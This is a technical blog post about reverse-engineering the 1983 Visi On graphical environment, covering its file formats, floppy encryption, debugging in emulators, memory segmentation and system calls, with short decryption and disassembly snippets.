The Archives app is the built-in file manager for the VisiOn and is one of the standard apps. Somewhat surprisingly, it puts deleted files into the "Wastebasket" folder. Windows couldn't do that because of Apple's patents - but Apple clearly wasn't the first (I bet it's coming from Xerox).

The Archives app makes it clear that VisiOn's file system supports long file names. VisiOn runs on top of MS-DOS 2.0, so it has to implement its own FS on top of FAT for this to work. The app can also work in two-pane mode, but it divides the screen horizontally, so long file names would fit on the screen easily.

The "verb"-oriented interface requires the app to show a "NEW" item on the screen, though it is a bit confusing. Can you rename a "NEW" file?

Clip: the Archives application

There are some mysterious buttons we have not explored in VisiOn just yet. One of them, TRANSFER, is used to command the applications to perform a "copy-paste" operation. It is impossible to just "copy" a thing and then "paste" it multiple times.

You can see that the OPEN command is completely unnecessary, because a closed window can be opened simply by clicking its minimised button. It would be nice for VisiOn to remove the OPEN button and replace TRANSFER with separate COPY and PASTE buttons. It shouldn't be too difficult to implement - Transfer From and Transfer Into are different system events from the application's point of view. The concept of Copy&Paste wasn't ubiquitous, but it was not unheard of either, because the VisiOn Word has these options in the application menu, in addition to the system's TRANSFER.

By the way, did you notice a cute VisiOn icon in front of some app names? It is actually two "non-printable" characters, 0x16 and 0x17. The system font has a few more useful icons hidden in it.

Clip: copy and paste

The last important button on the system menu of the VisiOn operating system is OPTIONS. Some applications have a configuration file, and the contents of the configuration file can be displayed on the right side of the window. The Options window behaves like a separate app with a separate menu. It is kind of similar to a pop-up window.

Curiously, it is possible to open the Options window from within the application. The same Options dialogue is shown by Word either by clicking "OPTIONS" or by clicking "Print>local-print". But then Word also has Cut&Paste menu system that allows copying and pasting within the application (but not between the application windows).

Clip: "options" side-bar

# Now, to the technical stuff

# What we thought we knew about Visi On

At face value, Visi On is a sleek, minimalist-looking windowing system for office applications. But it was built by people involved with early object-oriented programming, and the sales pitch for the system made some pretty bold claims. Were they true? Let's find out.

# Fact-checking

This is a spoilers section for those who thought they knew things about Visi On! For everyone else, this is going to be boring - if so, skip to the next section :)

The primary objectives of Visi-On is a consistent user interface and portability. Visi-On is designed to run on any operating system. ("The Visi On experience")

Sort of. Claiming "Visi-On is designed to run on any operating system" is like claiming "Unix is designed to run on any hardware". Clearly, it was made with portability in mind, but even supporting CP/M-86 on the IBM PC would require a completely different VISION.EXE, and a different installer floppy format (i.e. you couldn't install the Visi On Calc we have on a VisiOn running on top of CP/M). Supporting a different computer architecture would have been quite an ordeal.

It did this by providing a kind of non machine specific "virtual machine" (called the Visi Machine) that all applications were written for. (Toasty Tech)

What you have above Visi On or VOS itself is an interface we call the Visimachine interface. That is all of the calls that you need as a product designer to use all of the facilities provided by Visi On. This is the virtual machine? For product designers, this is the virtual machine. ("Byte", 1983/6)

The term "virtual machine" used by VisiOn developers means something different from what we mean by the words "virtual machine" today. The closest word we use today would be "API". That's right, Visi On applications use a cross-platform API. Just like almost any other operating system today. I bet it was a really cool idea back in 1983, though.

By the way, "VisiHost" for IBM PC is VISION.EXE. The "VisiMachine", which is not a virtual machine, but a set of system libraries and the desktop manager, is also known as "VOS", "VisiOn Operating System", "Application Manager" or simply "Services".

The virtual machine provided supports virtual memory and concurrent processing. ("The Visi On Operating Environment", IEEE TCDE Bulletin, September 1983)

Half-true. Visi On indeed implements virtual memory, but it is a software implementation without any memory protection mechanisms. Nothing but good will stops applications from reading or corrupting memory used by other applications.

The words "concurrent processing" might lead you to believe that VisiOn is a truly multitasking system. But its concurrent processing capabilities are quite limited. It is most definitely not a preemptive multitasking system, because if an application hangs, the whole system hangs. There seem to be some provisions for background data processing, at least for printer spooling. I think a flavour of cooperative multitasking might be possible in VisiOn, but so far I could not find a way to run an application in the background, so maybe it is not multitasking at all!

[The virtual machine] comprises 12 abstract data types. Each abstract data type responds to messages and provides a specific type of service. ("The Visi On Operating Environment", IEEE TCDE Bulletin, September 1983)

Unclear. It seems there are some "messaging" capabilities, but most of the interaction with the OS is still done through regular system calls. So far, I have discovered only messages that create a window, define a menu and request events from the OS. And the messages aren't really related to the "abstract data types". Perhaps the representation of the objects and data types was different at the source-code level?

Also, this statement contradicts what the authors said about the system in an earlier interview.

Visihost is an object-oriented operating system, and it’s composed of 10 object types... You can establish instances of the objects by just sending messages to them on a Smalltalk message-class type interface. ("Byte", 6/1983)

Half-true. The "objects" do not seem to be "objects" in a modern sense. There is no system of attributes, methods and classes. Instead, there are instances of structures that are passed through the API to the OS. Most of the communication with the OS doesn't happen through messages; it happens through system calls.

In fact, the very same interview confirms this:

An object in Smalltalk basically is a message, yes, that carries with it something that says what can be done to it. Visi On objects are not that complex. They’re objects... yes, they do have context of what their formatting is, but they aren’t Smalltalk objects.

Next!

Activities request services from the Visi-Machine via Visi-Ops or via BITS (Basic Interaction Techniques). The two are distinguished in that a Visi-Op call requires a process ID. (A 16 bit number assigned by Visi-Corp to a given application program). ("Visi On from a Software Developer's point of view", 1983)

Mostly false. It seems VisiCorp itself couldn't agree on what BITS means; sometimes it is used for low-level system calls for the kernel ("VisiHost"), and sometimes it is used to talk about patterns of the user interface. Also, a process ID is not assigned by Visi-Corp; it is evaluated at run time.

VOS (note: VisiMachine) is the only activity that actually does direct Visihost calls. All other calls come through VOS itself. ("Byte", 6/1983)

Mostly true. On the machine code level, applications can and do call the kernel ("VisiHost") directly, but all the existing applications only do so to talk to the Services ("VisiMachine"). Nothing stops an application from making arbitrary VisiHost calls - this is how VisiMachine itself gets things done - but presumably that would harm portability.

Visi On did not, however, include a graphical file manager. ("Visi On", Wikipedia, November 2025)

False. There is an application called Archive, which is part of the "Services", and it is a bona fide file manager. It does not have icons, but then there are no icons in any other part of VisiOn, either.

The scripts capability is another important aspect of ease of use. It’s a learn mode. It has a window that you can interact with. You can stop that learn mode at any time and tell the system to accept a variable. You open a scripts window and say, “learn.” Then the system prompts you for a name, you type in the name, and that will be the name of a script. ("Byte", 6/1983)

Unfortunately, this part of VisiOn seems to be missing from the release. And speaking of missing features, the demo from 1983 also has a mysterious SAVE button that is not present in the final release.

# External sources

Most of the technical documentation about the system available until now comes from the following articles and posts:

# The fun begins!

# Initial investigation

Visi On is meant to run on an IBM PC XT with a hard disk. It won't run properly on an IBM PC AT, and it won't run in most emulators. The pre-installed unprotected version with an AT patch available on ToastyTech runs in some emulators (86Box and PCEm). There are three software packages that can be installed in VisiOn: Word, Calc and Graph. Trying to install them from any old floppy is not possible due to various copy-protection methods (more on this soon).

The installed copy of VisiOn on the hard drive has the executable file VISION.EXE and a bunch of cryptic files in the VISI_ON folder. The most interesting of those are:

     856 PROGRAMS.VOS -- ??? binary data
  200000 RESERVED.VOS -- resources for the applications? swap?
  777728 SEG00000.VOS -- the actual software installed in the OS?
    3290 SEGMENTS.VOS -- ??? binary data

The files don't have an obvious structure. To get a feel for a file, I use my favourite tool: Load Image From Raw Data in GNU IMP.

Scrolling through the segments surfaces a high-resolution font file and a garbled startup screen:

Are the installed files encrypted?

# Checking the installation media

The installation floppies have files with names matching those on the hard disk, but with different content. It is obvious that the contents are encrypted by some simple method. For example, here are the contents of the first installation floppy:

    3110 16 Dec  1983 00000009.VOS -- same as the installed version, but encrypted
   10334 16 Dec  1983 00000010.VOS -- same as the installed version, but encrypted
     110 16 Dec  1983 H0000000.VOS -- a binary directory of files
   65536 16 Dec  1983 SEG10002.VOS -- overlay, seemingly encrypted
   65536 16 Dec  1983 SEG10003.VOS -- overlay, -""-
   65536 16 Dec  1983 SEG10005.VOS -- overlay, -""-
   44604 16 Dec  1983 VINSTALL.COM -- installer tool
   71680 16 Dec  1983 VISION.EXE   -- the program itself, very clearly it is encrypted in some simple way

The contents of the files show a repeating pattern. For example, in SEG10003.VOS:

0000fe50  3c 6a 4f 3c 3c 6a 4f 3c  3c 6a 4f 3c 3c 6a 4f 3c  |<jO<<jO<<jO<<jO<|
0000fe60  3c 6a b0 3c c3 6a 4f 3c  3c 6a 4f 3c 3c 6a 4f 3c  |<j.<.jO<<jO<<jO<|
0000fe70  3c 6a 4f 3c 3c 6a 4f 3c  3c 6a 4f 3c 3c 6a 4f 3c  |<jO<<jO<<jO<<jO<|

Such a repeating pattern is indicative of XOR encryption. This is a very poor encryption technique: not only can the key be guessed easily, but a long run of zero bytes exposes the key verbatim.
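To illustrate, here is a minimal decryptor sketch for a repeating 4-byte XOR key. This is not VisiCorp's tool; the key below is a guess read straight off the repeating run above, on the assumption that the run encrypts a stretch of zero bytes (0 ^ k == k).

#include <stdio.h>

int main(int argc, char **argv)
{
    unsigned char key[4] = { 0x3c, 0x6a, 0x4f, 0x3c }; /* hypothetical, from the dump above */
    if (argc != 3) return 1;
    FILE *in = fopen(argv[1], "rb"), *out = fopen(argv[2], "wb");
    if (!in || !out) return 1;
    int c;
    for (long i = 0; (c = fgetc(in)) != EOF; i++)
        fputc(c ^ key[i & 3], out);    /* repeat the key every 4 bytes */
    fclose(out);
    fclose(in);
    return 0;
}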

# Tweaking the installation media

The installation floppies are not only encrypted, but also copy-protected with "out-of-bounds" sectors. They require special emulation methods, but thankfully those methods are well described in 86Box and HxC floppy tool documentation.

With a simple encryption and decryption tool, I managed to change the text in the Tutorial app shipped with the operating system and package it back to the (still copy-protected) floppy.

# Figuring out the floppy file system

A floppy with a Visi On program has dozens of files named 00001000.VOS , 00001234.VOS and so on. Which files are mandatory, and what is in them? Lots of trial and error ("let's delete this file, let's put back this file") shows that a floppy must have the following files:

  • 00000000.VOS - simply 12 zeroes
  • 00001000.VOS - the description of the floppy (disk label and the list of programs on it), encrypted
  • 00001001.VOS - a copy-protection mechanism, twice-encrypted
  • an installation script referenced from 00001000.VOS ,
  • components of the program referenced from the installation script

The patterns in the unencrypted files can be observed by simply looking at the files. For example, this is a fragment of 00001000.VOS from the Visi On Calc package:

00000080  16 17 20 43 6f 6e 76 65  72 74 20 74 6f 20 43 61  |.. Convert to Ca|
00000090  6c 63 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |lc..............|
000000a0  31 2e 30 00 00 00 00 00  00 00 00 00 01 00 41 04  |1.0...........A.|
000000b0  00 00 00 00 00 00 00 00                           |........|

Note: the IBM PC is a little-endian architecture. The byte sequence 41 04 should be read as 0x0441, or 1089 in decimal. Sure enough, 00001089.VOS stores the installation script for the program, referencing other files on the floppy disk:

00000000  a7 43 16 17 20 43 6f 6e  76 65 72 74 20 74 6f 20  |.C.. Convert to | <- magic number + logo + name
00000010  43 61 6c 63 00 00 00 00  00 00 00 00 00 00 00 00  |Calc............|
00000020  00 00 31 2e 30 00 00 00  00 00 00 00 00 00 01 00  |..1.0...........| <- version
00000030  03 00 02 00 00 00 00 00  00 00 00 00 00 00 0a 00  |................|
00000040  00 00 01 00 42 04 01 00  02 00 43 04 01 00 01 00  |....B.....C.....| <- 0x442 - first file to install 
00000050  44 04 01 00 02 00 45 04  01 00 02 00 46 04 01 00  |D.....E.....F...|
00000060  02 00 47 04 01 00 02 00  48 04 01 00 01 00 49 04  |..G.....H.....I.|
00000070  01 00 01 00 4a 04 01 00  01 00 4b 04 01 00 01 00  |....J.....K.....|
00000080  00 00 02 00 4c 04                                 |....L.|           <- .... 0x44c - last file to install
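As a quick illustration of the little-endian reading (a sketch; the 41 04 bytes are the ones from the dump of 00001000.VOS above):

#include <stdint.h>
#include <stdio.h>

/* Read a little-endian 16-bit file ID and turn it into the
   decimal .VOS file name used on the floppy. */
static uint16_t read_le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

int main(void)
{
    const uint8_t ref[2] = { 0x41, 0x04 };              /* bytes from the dump */
    printf("%08u.VOS\n", (unsigned)read_le16(ref));     /* prints 00001089.VOS */
    return 0;
}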

# Unencrypted installer

A big obstacle in developing applications is the copy-protection mechanism in 00001001.VOS. The file itself is lightly encrypted with XOR, and then heavily encrypted with XOR once again. Decrypting it and loading it in Ghidra allowed me to understand (generally speaking) that this little tool is an x86 program with a custom header and a single entry point. This entry point is called by the installer to check that the floppy is copy-protected and to decrypt the contents of the floppy.

Atsuko eventually rewrote the copy-protection binary to skip the encryption and floppy checks. This version of 00001001.VOS is very useful even for installing VisiCorp's own programs, as it allows using regular floppy disks and tweaking the program sources before installation.

Fun note: the XOR encryption key on software disks is stored in the clear at the beginning of every 00001001.VOS file. Such a glaring oversight!

# Installer script; linking script

Checking unencrypted files (looking closely at their contents in a hex editor) revealed the internal structure of a program package:

  • An installer script: it describes which VOS files are needed by the program,
  • One or more "code segment" files: these mostly contain position-independent machine code for the Intel 8086 CPU (defeating the theory of VisiOn implementing a virtual machine),
  • One "data segment" file: it stores the data needed by the program at all times,
  • One linking script, which is somewhat similar to a header in EXE, DLL or ELF files: it points to a list of all "entry points" in the "code segment" files, and tells the OS where the program's main() function is, and
  • One mini file system with a collection of various files used by the program.

The type of VOS file is determined by two independent factors:

  • The installer script marks the header file and the mini file system in a special way,
  • "Data" and "code" segment files have an 8-byte header (four 16-bit numbers: magic , type of the segment, number of the segment, the length of the segment in bytes)

# Running under the debugger

Operating system development needs a good debugger. Even the history of Windows hints that a good debugger is essential for building a trillion-dollar software empire. And, as you can imagine, Visi On doesn't run under debuggers, so an IBM PC emulator with a built-in debugger is a must.

# Bochs

There are multiple debugging emulators: Qemu, MAME, Bochs, DosBox and MartyPC. None could run Visi On out of the box. Among these, Bochs was my primary target, as it can emulate a Mouse Systems mouse - the only mouse type supported by Visi On. Thanks to Bochs' built-in debugging features, I produced a simple patch that allowed Visi On to boot in Bochs and Qemu. The patch simply skips a few mouse-related checks:

--- visionat.exe.dmp
+++ viatmice.exe.dmp
@@ -2534,4 +2534,4 @@
 0000a010  e8 7a 00 eb 49 b0 83 e8  47 00 e8 81 00 8b 1e 80  |.z..I...G.......|
-0000a020  0b 8d 57 05 ec a8 01 74  f8 8d 57 00 ec 24 f8 3c  |..W....t..W..$.<|
-0000a030  80 75 ee e8 78 00 e8 54  00 eb 23 c7 06 7e 0b ff  |.u..x..T..#..~..|
+0000a020  0b 8d 57 05 ec a8 01 90  90 8d 57 00 ec 24 f8 3c  |..W.......W..$.<|
+0000a030  80 90 90 e8 78 00 e8 54  00 eb 23 c7 06 7e 0b ff  |....x..T..#..~..|
 0000a040  ff 06 b0 33 b4 35 cd 21  8c c0 07 0b c3 bb 7a 06  |...3.5.!......z.|

The Bochs interface rhymes visually with VisiOn, being monochrome and pixelated.

# Mouse driver

If you want to reverse engineer a multi-tasking graphical operating system, the first thing you probably should figure out is its mouse driver. When you start an application, you cannot know where it will be loaded into the computer's memory until it is started. And when it is started, it is already too late to look at the application's initialisation. We need to stop the operating system the very moment we ask to start the program. In other words, the moment we release the mouse button after the double click.

Visi On uses serial mice connected over the COM port. Looking at the emulator events, I can see that the COM port is configured to be interrupt-driven. On an IBM PC, the handler for COM1 port interrupts is known as IRQ4/INT 0x0c. In other words, the address of the mouse driver is recorded in the interrupt table of the computer - it is set to 1a68:0000, which, by the way, is exactly where it is in VISION.EXE.

In Bochs, you cannot set a breakpoint (sometimes known as a "pause") at the interrupt address itself, but you can set one at the next instruction. Once I figured this out, it was easy to break inside the mouse driver and understand how it works.

Now I could simulate mouse clicks in the following way. RAM address 0x1f21b holds the mouse button status. Writing "1" there makes the OS think there was a right button click. Writing "2" and then "0" works as "press and release the left mouse button". With this, I managed to pinpoint the moment the OS starts an application.

# Reverse-engineering pains

A tool that can convert machine code back to something human-readable is called a disassembler. There are many options, but I went with NSA's Ghidra, as it is the tool I've used in the past to reverse-engineer the Sumikko Gurashi computer.

Normally, disassembly is a straightforward process. Truth be told, I expected the whole reverse engineering process to take a couple of weekends. If only life were so simple...

# Visi On was compiled by a vintage C compiler

Here is a bit of the disassembly of EDLIN, Microsoft's now-open-source contemporary text editor, as seen by Ghidra:

       0000:0119 50              PUSH       AX
       0000:011a b4 30           MOV        AH,0x30     ; syscall 0x30
       0000:011c cd 21           INT        0x21        ; an MS-DOS call
       0000:011e 3c 02           CMP        AL,0x2
       0000:0120 7d 05           JGE        LAB_0000_0127
       0000:0122 ba 8a 10        MOV        DX,0x108a   ; pointer to an error message
       0000:0125 eb e7           JMP        LAB_0000_010e

Here is the corresponding source code:

;----- Check Version Number --------------------------------------------;
        push    ax
        mov     ah,Get_Version
        int     21h
        cmp     al,2
        jae     vers_ok                         ; version >= 2, enter editor
        mov     dx,offset dg:bad_vers_err
        jmp     short errj
;-----------------------------------------------------------------------;

The disassembly basically matches the source code and thus is easy to understand.

Compare with the disassembly coming from VisiOn:

       64c5:0c55 c7 06 16        MOV        word ptr [0x16],0x0
                 00 00 00
       64c5:0c5b 8b 1e 16 00     MOV        BX,word ptr [0x16]
       64c5:0c5f 89 1e 18 00     MOV        word ptr [0x18],BX
       64c5:0c63 8b 0e 18 00     MOV        CX,word ptr [0x18]
       64c5:0c67 89 0e 9c 15     MOV        word ptr [0x159c],CX
       64c5:0c6b 8b 16 9c 15     MOV        DX,word ptr [0x159c]
       64c5:0c6f 89 16 de 09     MOV        word ptr [0x9de],DX
       64c5:0c73 83 ec 02        SUB        SP,0x2
       64c5:0c76 c7 46 d6        MOV        word ptr [BP + -0x2a],0x1
                 01 00
       64c5:0c7b 83 ec 02        SUB        SP,0x2
       64c5:0c7e c7 46 d4        MOV        word ptr [BP + -0x2c],0x1742
                 42 17
       64c5:0c83 e8 9e 00        CALL       define_window

Can you follow the logic?

var_0x16 = 0
BX = var_0x16
var_0x18 = BX
CX = var_0x18
var_0x159c = CX
DX = var_0x159c
var_0x9de = DX
**whack the stack!**
BP[-0x2a] = 1
**whack the stack!**
BP[-0x2c] = 0x1742
CALL       define_window

Do you also feel your blood boil at this "hot potato" game of variable assignments? It should have been:

var_0x16 = 0
var_0x18 = 0
var_0x9de = 0
var_0x159c = 0
BX = 0
CX = 0
DX = 0
CALL define_window(0x1742, 1)

# BP stack frame

The comment "whack the stack!" above is quite representative of what is happening in the code.

Most computers nowadays have a stack. If you don't know what a "stack" is, imagine: you work as a clerk, and your assignments come in the form of sheets of paper with tasks. You put new sheets with tasks on top of the sheets you already have. When you need to process the next task, you usually take the topmost sheet. You might feel bad for all the old tasks at the bottom of the stack, but it is the easiest way to keep track of things.

Here is where "stack frames" come in. Now, imagine that you have a coworker obsessed with efficiency. They think that some old tasks should be done before newer tasks, and some new tasks should be done after old tasks. To do so, they take a chunk of the sheets from the stack, rearrange them as they see fit, and put them back in. Sometimes they even grab multiple unrelated chunks of the stack at once. A chunk of a stack is a "stack frame".

Using stack frames simplifies code compilation for subroutines, because a subroutine can assume that it can do whatever it wants with its stack frame, treating it like its own private memory allocated on the global stack. "Forgetting" the data from the stack frame is as simple as moving the stack pointer.

This technique used to be common on x86-based computers some 40 years ago. Ghidra doesn't support it at all. Bochs doesn't care about the BP stack and can only show you the SP stack. VisiOn almost never uses the SP stack directly; most applications work with the BP stack.

I believe this is a property of the C compiler Visi On used. A different compiler might have used SP, just like modern compilers do. And most certainly, a hypothetical Visi On port for Motorola 68k CPU, a processor that doesn't have a BP register, would not need to emulate the BP stack frame.

# Unusual cross-segment calls and "magic" long pointers

# Segment model

The IBM PC, VisiOn's target computer, is built around the Intel 8088 processor. A remarkable thing about this processor is that it uses the segment memory model. In a nutshell, at any given moment in time, a program has access to no more than four fragments of the computer's RAM, each 64 kilobytes in size: the code segment, the data segment, the stack segment, and the "extra" segment. This memory organisation simplifies porting programs from 8-bit computers, and in theory allows a straightforward implementation of multi-tasking for small programs. If you have 640 kilobytes of RAM, and your program is configured to use a single segment for all four segments (CS, DS, SS and ES), you could easily load 10 programs at once.

But, as it happens, segments are quite limiting. A single data segment can store about 35 pages of "plain text" in a common 8-bit encoding. If you want to store a long document in the computer's RAM (a novel or a thesis), your program will need to switch between multiple data segments.

By the way, a memory reference to data within a single segment is called a "short pointer". A memory reference that crosses into a different segment is a "far" reference. To unambiguously identify a region in memory, you need a "long pointer" consisting of a segment and offset pair.

Things are much worse if a program doesn't fit in a single code segment. For programs running under DOS, it is usually not an issue: the program can assume it has a monopoly over the computer's RAM and just use "CALL FAR" and "JMP FAR" to change the current code segment. Even so, the operating system might load the program into any available memory segment. If the program uses "far" calls or pointers, the operating system must perform a "relocation". This is how things were done in DOS and early Windows versions.

VisiOn's approach to memory management is different from DOS. Each code segment is position-independent; it cannot use far CALLs or long pointers. Large programs are split into multiple code segments. When a program is executing code segment 1 and needs to call a function from code segment 2, it must do so through the operating system. The benefit of this approach is a software implementation of "virtual memory". If a program is, for example, 2 megabytes large and the computer only has 512 kB of RAM, the operating system can keep in RAM only the segments of the program that are being executed right now. When a program requests a segment that is not in RAM, the OS can load it from the hard drive - a form of swapping.

By the way, most of the time the ES segment is set to the kernel/OS/VisiHost data segment, and SS is set to DS (the current application's data segment).

# "Magic" pointers

Even so, VisiOn could have been "normal" about its implementation of virtual memory. A far call might have looked like this: call_segment(segment_number, function_address). Instead, it looks like this: call(). Magic!

This is what cross-segment calls look like in Ghidra (and it would look exactly the same in any other disassembler):

    5e32:009b cd c1       INT 0xc1                    ; Call operating system entry point 0xc1
    5e32:009d 28 08       SUB byte ptr [BX + SI],CL   ; ??? Change a random memory byte ???

The disassembler assumes that the bytes 0x28 0x08 encode a command. It is a normal thing to assume; this is how the Intel x86 processor normally works. But in this case, it is not a command, it is a 16-bit number: 0x0828. The OS tweaks the return address from the INT 0xc1 handler so these two bytes are skipped by the processor.

I call these numbers "magic pointers", because a long pointer normally must be two 16-bit numbers: a segment and an offset. But in VisiOn, a single 16-bit number encodes both. This is implemented in a really clever way. Remember the "entry points" table I mentioned?

The "entry points" table has pairs of 16-bit numbers: segment and offset. For example, if a function is stored in a segment file 0x0002 at the offset 0x1234, the table will have both numbers written down:

<entry_points_table:0> 0x1234 0x0002

Now, what is the "magic pointer", then? It is an offset, in bytes, of a row in this table, relative to the beginning of the code segment where the entry points table is stored. Baaam!

The code above, INT 0xc1 ; 0x0828 basically tells the OS:

  1. Load the code segment with the entry points table - we told you about it when we installed the program
  2. Go to the position 0x0828 in this code segment and read two numbers from there: offset and segment
  3. Do the far call to a function at segment:offset
  4. When the function is finished, return everything the way it was before

Moreover, the segment references in the entry points table are dynamically refreshed. The operating system keeps track of the physical RAM address where each segment is loaded.
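Here is the whole mechanism in C terms - a sketch of my understanding, not VisiCorp's code, and the helper names are mine:

#include <stdint.h>
#include <stdio.h>

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* Resolve a "magic pointer": the 16-bit word after INT 0xc1 is a
   byte offset into the entry points table of a known code segment,
   where an (offset, segment) pair is stored. */
static void resolve_magic(const uint8_t *table_seg, uint16_t magic,
                          uint16_t *offset, uint16_t *segment)
{
    *offset  = le16(table_seg + magic);
    *segment = le16(table_seg + magic + 2);
}

int main(void)
{
    uint8_t seg[0x1000] = { 0 };
    /* Simulate the row from the example: offset 0x1234, segment file 0x0002 */
    seg[0x828] = 0x34; seg[0x829] = 0x12; seg[0x82a] = 0x02;
    uint16_t off, sgm;
    resolve_magic(seg, 0x0828, &off, &sgm);
    printf("far call to %04x:%04x\n", (unsigned)sgm, (unsigned)off); /* 0002:1234 */
    return 0;
}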

# Code segment reallocations

VisiOn is unusually aggressive at memory management compared to its contemporaries; it keeps swapping code segments in and out. This is very troublesome for debugging.

Imagine that the program you are debugging, currently loaded into the computer's RAM at segment 0x5e32, makes a cross-segment call at offset 0x9b (like in the code snippet in the previous chapter). Let's say you're not interested in what is happening in this call, and you want to just "step over" the function call. You expect that when the far call is completed, your program will continue from the address 0x5e32:0x09f (the next command after the "magic pointer"). Oh, how naive!

The operating system can (and often does) decide to swap your program out of RAM during the far call. When the OS swaps your program back in, it will put it in the next available code segment, for example, 0x4c4b. The execution will continue not from 0x5e32:0x09f but from 0x4c4b:0x09f. Your breakpoint at 0x5e32:0x09f won't activate; the debugger's "step over" function simply doesn't work.

# Note: the only thing the application absolutely must do is bounce off the trampoline

All the code segments in VisiOn have the command jmp [es:0x0] at address 0x9.

When an application's function is called (be it main, an event handler, or a "magic pointer" call), the OS pushes 0x9 on the stack as the return address before jumping to the function's entry point.

When a function finishes its work and executes a ret command, the CPU takes the return address from the stack (0x9) and executes the command jmp [es:0x0]. This is a far jump, but where does it jump to? The CPU reads a long pointer from es:0 (the beginning of the OS kernel data segment) and jumps to it; the code at the destination decides where to jmp next. This technique is called "jumping into a trampoline".

If you're writing your program in assembly (and you shouldn't be), then no one stops you from replacing ret at the end of your functions with:

add SP, 2      ; drop the 0x9 return address the OS pushed
jmp [es:0x0]   ; still bounce off the trampoline

You can avoid "returning to 0x9", but you still must jump into the trampoline. Fun!

# Talking to VisiHost

A major part of the reverse-engineering effort was focused on trying to understand the internals of the two smallest applications available for the OS: the Tutorial app ("tutor") and the Convert To Calc app ("cvtcalc"). The Tutorial app is 6.3 kilobytes of machine code, but that's actually quite a lot: 3525 lines (about 80 A4 sheets) of disassembly.

# Leveraging magic breakpoints

One thing that really simplified the debugging was adding Bochs' "magic breakpoints" to the Tutor and CVTCalc apps. Magic breakpoints work like this: when the emulator encounters a useless instruction - xchg bx, bx - it treats it as a breakpoint. These breakpoints happen as if by "magic", without any need to simulate mouse click events or figure out segment relocations between the calls to the OS. The only downside: this command needs to be squeezed into the existing machine code. Thankfully, some of the machine instructions in the Tutor app are NOP ("do nothing"), so I replaced a few of those with xchg bx, bx.

# System calls

Most operating systems provide "system calls", a set of library methods that can manage disks, RAM, and so on. Graphical operating systems often provide calls for creating windows, and even handling the mouse and keyboard. Visi On is no exception.

A standard way to make a system call on an IBM PC-compatible is to call a software interrupt . The operating system tells the CPU that it can handle a certain software interrupt; a program uses this interrupt to communicate with the OS; the OS can return control to the program when the system call is finished. This is how system calls work in MS-DOS, for example:

;; Print a character
mov DL, '!'     ; the character to print in the DL register
mov AH, 2       ; function number 2 in the AH register
int 0x21        ; MS-DOS system call

VisiOn registers multiple interrupt handlers; among those, three are commonly used: 0xc0, 0xc1 and 0xc2. The interrupts 0xc1 and 0xc2 are used for direct and indirect "magic pointer" function calls. 0xc0 is the system call interrupt; it is the interface to the VisiHost.

Designed with portability in mind, VisiHost accepts arguments to the system calls through the stack: different processors might have different registers, but VisiOn most definitely needs to have a stack to work. A VisiOn system call looks like this:

;; Get the Segment ID for own data segment
push process_id         ; put "process_id" variable on the stack
push 0x219              ; push the syscall number and the size of the arguments in bytes on the stack
int 0xc0                ; call VisiHost

I originally thought that 0x219 was the number of the syscall, but very quickly discovered that there are only ~0x70 syscall handlers, so the actual syscall number is simply 0x19. It took a bit of trial and error, reading the disassembly of the kernel, and stepping through a call to understand that the 0x02 in the high byte is the number of arguments passed to the syscall times two - in other words, their size in bytes.

The reason for that is simple: the application's stack is stored in its own data segment. When the operating system takes control, it uses its own data segment with its own stack. To pass the parameters between the stacks, the OS copies all the syscall arguments from one stack to the other.
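So the word pushed before INT 0xc0 is a packed pair: argument size in the high byte, syscall number in the low byte. A sketch of the encoding (the macro name is mine):

#include <stdint.h>
#include <stdio.h>

/* High byte: size of the arguments in bytes (two per argument);
   low byte: the syscall number. */
#define VOS_CALL_WORD(no, nargs) ((uint16_t)((((nargs) * 2) << 8) | (no)))

int main(void)
{
    /* Get_Segment_ID (0x19) with one argument, a process ID: */
    printf("0x%04x\n", (unsigned)VOS_CALL_WORD(0x19, 1)); /* prints 0x0219 */
    return 0;
}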

# Get_Process_ID and Get_Segment_ID

There aren't that many system calls that a regular application makes. The first two calls an application makes are 0x17 and 0x19.

0x17 returns the process ID for the current application.

0x19 takes a process ID as an argument and returns the data segment ID for the application. A VisiOn application absolutely must know its own Data Segment ID. The Segment ID is passed to all the syscalls; for example, when the application asks the OS to print a string on the screen, it needs to pass not only the offset of the string relative to a data segment, but also the Segment ID of that data segment.

These two are followed by a system call 0x18 - "get Application Manager data" - which I will describe later.

# Messages

A bare-bones application for VisiOn must:

  • create a window,
  • then create a menu,
  • then wait for a menu click,
  • and then destroy the menu and the window.

All of this is done with system calls 0x21 and 0x22. How did I find this out? There was no silver bullet: I ran the same code in the debugger over and over again, tweaking some parameters, commenting out bits of code here and there, and eventually asked Atsuko to write a small assembly program following my specifications, to confirm the discoveries experimentally.

Originally, I thought that 0x21 was something like "create windows & menus" and 0x22 was "redraw the window and maybe wait for an event". But something didn't feel right. 0x21 is always called with a different structure as the argument: sometimes it defines a window, sometimes it defines a menu and the event handlers, and sometimes it destroys all the created UI elements. 0x22 always returns a value, and sometimes it makes the application go into the background.

So, my conclusion is: most likely, 0x21 is "send the message" and 0x22 is "receive the message (maybe wait for one)". I don't have many examples of "messages", but I managed to partially describe "create the window" and "wait for the events" structures.

These messages resemble Smalltalk, but they are relatively rare compared to other types of system calls. It makes me think that at some point VisiOn left behind its Smalltalk roots, and the "messages" subsystem might be just a remnant of the original design.

# Fake stack

"Create the menu and wait for an event" function does something wacky. The structure we pass to the syscall 0x21 accepts a pointer as one of the arguments. In the original VisiOn apps, it points to a structure created on a stack. For the sake of simplicity, we placed this structure in the data segment. Things worked until we added on-screen buttons; clicking a button would crash the system. Why? The operating system used this pointer to access data from both after and before the pointer. In other words, this is a pointer to the middle of a structure!

Why would anyone do that? No idea. This detail of the implementation likely didn't matter for programs written in Visi C, and most developers probably didn't even know about it.

# Reaching out to VisiMachine

The articles in BYTE magazine tell us that if an application wants to draw on the screen, print text, read a file from the disk, or define an on-screen button, it needs to do so through VisiMachine. Indeed, while VisiHost system calls can do a great many things, the applications I tried to reverse-engineer never call the low-level ones directly. For example, there are syscalls 0x34 and 0x35 for drawing a bitmap on the screen and copying a bitmap from the screen, but these syscalls are only ever called from the Services app. Moreover, they're not "window-aware": with these calls, an application can draw on the screen outside of its own window!

So, if we want to be good citizens, we need to follow the standard call convention and reach out to the VisiMachine. But how?!

# Syscall 0x1e

The most common system call in any application is 0x1e. This call seemingly does almost anything, including but not limited to: reading data from files, printing text on the screen and creating on-screen buttons. Sounds like a "VisiOp" (VisiMachine) call, doesn't it?

